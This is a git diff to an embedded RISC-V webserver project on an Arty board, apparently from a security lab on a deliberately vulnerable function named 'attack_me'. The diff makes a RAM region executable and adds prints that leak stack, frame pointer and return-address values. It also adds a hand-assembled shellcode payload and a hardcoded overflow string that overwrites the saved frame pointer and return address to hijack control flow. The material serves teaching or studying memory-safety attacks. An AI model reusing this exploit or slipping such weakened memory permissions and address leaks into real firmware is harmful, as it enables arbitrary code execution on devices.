diff --git a/ArtyImplementation/bsp/X300/multizone.cfg b/ArtyImplementation/bsp/X300/multizone.cfg index e6db83e217035a3c7b98fea6c06d7fcdcadd103b..6ea50a43fc15c4ab7030efff4a0f387c915cbffd 100644 --- a/ArtyImplementation/bsp/X300/multizone.cfg +++ b/ArtyImplementation/bsp/X300/multizone.cfg @@ -7,7 +7,7 @@ Tick = 10 # ms Zone = 1 plic = 21 # ETHERNET base = 0x20440000; size = 128K; rwx = rwx # FLASH - base = 0x80001800; size = 38K; rwx = rw # RAM + base = 0x80001800; size = 38K; rwx = rwx # RAM base = 0x8000B000; size = 2K; rwx = w # SH BUFF1 base = 0x8000B800; size = 8K; rwx = w # SH BUFF2 base = 0x60000000; size = 0x2000; rwx = rw # XEMACLITE diff --git a/ArtyImplementation/payload_arty.as b/ArtyImplementation/payload_arty.as new file mode 100644 index 0000000000000000000000000000000000000000..a9d74b00c8b16b6776e41da7914570b3cc6d07c1 --- /dev/null +++ b/ArtyImplementation/payload_arty.as @@ -0,0 +1,4 @@ +.text + li a0, 0x2044b37c + li t3, 0x204408f8 + jalr t4, t3 diff --git a/ArtyImplementation/zone1/message_handling.h b/ArtyImplementation/zone1/message_handling.h index ee73250ab7b0453f202b0c03544808d9bb721a49..e61f514b6166c9d790576a5c970d9f495b76eaf3 100644 --- a/ArtyImplementation/zone1/message_handling.h +++ b/ArtyImplementation/zone1/message_handling.h @@ -5,9 +5,9 @@ #include "multizone.h" #define printf2(format, args...) { /* Multi-part printf() */\ - char *str = malloc(64); \ + char *str = malloc(128); \ if (str != NULL){ \ - const int len = snprintf(str, 64, format, ## args); \ + const int len = snprintf(str, 128, format, ## args); \ for (int i=0; i<(len/16)+1; i++){ \ while(!MZONE_SEND(2, (str+16*i))) MZONE_YIELD(); \ } \ diff --git a/ArtyImplementation/zone1/server_utility.h b/ArtyImplementation/zone1/server_utility.h index 52f8c585a8c56a41c69b191400a0015f6c670b42..e8612819ad2f3f791447632dd8f2141553446194 100644 --- a/ArtyImplementation/zone1/server_utility.h +++ b/ArtyImplementation/zone1/server_utility.h @@ -43,9 +43,10 @@ char *attack_me(char *data, uint32_t data_len) { // nobody could possibly enter a name longer than 20 characters, so this buffer // is definitely large enough char message[128]; - //for debugging purpose - printf2("Framepointer: 0x%x\n", *(uint32_t *)&message[140]); - printf2("Rücksprungadresse: 0x%x\n", *(uint32_t *)&message[140] - 204); + printf2("CD: 0x%08x ", ((uint32_t*)(&message[8]))); + printf2("F-: 0x%08x ", *((uint32_t*)(&message[136]))); + printf2("RA: 0x%08x ", *((uint32_t*)(&message[140]))); + printf2("FP: 0x%08x ", *((uint32_t*)(&message[156]))); memset(message, 'B', sizeof(message)); memcpy(message, "Hallo, ", 7); @@ -70,13 +71,54 @@ char *server_request_handler(char *location, enum request_type type, char *data, if(data_len >= 5 && strncmp(data, "name=", 5) == 0) { uint32_t name_len = data_len - 5; name_len = webserver_percent_decode(&data[5], name_len); + data = "X" // padding to align the instructions + + "\x37\xb5\x44\x20" // 0: lui a0,0x2044b + "\x13\x05\xc5\x37" // 4: addi a0,a0,892 # 0x2044b37c + "\x37\x1e\x44\x20" // 8: lui t3,0x20441 + "\x13\x0e\x8e\x8f" // c: addi t3,t3,-1800 # 0x204408f8 + "\xe7\x0e\x0e\x00" // 10: jalr t4,t3 + + + + "XXXX" // padding to overwrite the return address + "XXXX" // padding to overwrite the return address + "XXXX" // padding to overwrite the return address + "XXXX" // padding to overwrite the return address + "XXXX" // padding to overwrite the return address + "XXXX" // padding to overwrite the return address + "XXXX" // padding to overwrite the return address + "XXXX" // padding to overwrite the return address + "XXXX" // padding to overwrite the return address + "XXXX" // padding to overwrite the return address + "XXXX" // padding to overwrite the return address + "XXXX" // padding to overwrite the return address + "XXXX" // padding to overwrite the return address + "XXXX" // padding to overwrite the return address + "XXXX" // padding to overwrite the return address + "XXXX" // padding to overwrite the return address + "XXXX" // padding to overwrite the return address + "XXXX" // padding to overwrite the return address + "XXXX" // padding to overwrite the return address + "XXXX" // padding to overwrite the return address + "XXXX" // padding to overwrite the return address + "XXXX" // padding to overwrite the return address + "XXXX" // padding to overwrite the return address + "XXXX" // padding to overwrite the return address + "XXXX" // padding to overwrite the return address + "XXXX" // padding to overwrite the return address + "XXXX" // padding to overwrite the return address + "\x2c\x69\x00\x80" // the new frame pointer: 0x80004ba2 + "\x78\x68\x00\x80"; // the new return address: 0x80006870 + // nobody could possibly enter a name longer than 20 characters, so this buffer // is definitely large enough char *return_string; - return_string = attack_me(&data[5], name_len); + //return_string = attack_me(&data[5], name_len); + return_string = attack_me(data, 137); char* response = http_prepare_response(return_string, strlen(return_string), 200, out_len); - free(return_string); + //free(return_string); return response; } else { return http_prepare_response(RESPONSE_404, strlen(RESPONSE_404), 404, out_len);